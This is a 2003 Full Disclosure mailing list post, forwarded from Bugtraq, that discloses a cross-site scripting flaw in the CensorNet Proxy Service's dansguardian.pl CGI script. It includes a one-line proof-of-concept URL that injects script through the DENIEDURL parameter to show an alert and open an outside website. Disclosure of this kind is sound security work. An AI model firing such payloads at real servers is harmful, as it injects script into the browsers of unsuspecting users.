Full Disclosure mailing list archives

Fw: CensorNet: Cross Site Scripting Vulnerability

From: "Richard Maudsley" <r_i_c_h_lists () btopenworld com>
Date: Thu, 23 Oct 2003 18:49:02 +0100


----- Original Message ----- 
From: "Richard Maudsley" <maudr001 () rbwm org>
To: <bugtraq () securityfocus com>; <support () adelix com>; <wrigd006 () rbwm org>;
<frenw001 () rbwm org>
Sent: Wednesday, October 22, 2003 12:51 PM
Subject: CensorNet: Cross Site Scripting Vulnerability


Hello,

A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.

Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk";)</script>

Regards,
Richard Maudsley


- -------------------------------------------------------------------
    This email has been sent from the Royal Borough of Windsor and
Maidenhead LEA system, if you have cause for complaint regarding the
       content of this email please contact abuse () rbwm org
- -------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Fw: CensorNet: Cross Site Scripting Vulnerability Richard Maudsley (Oct 24)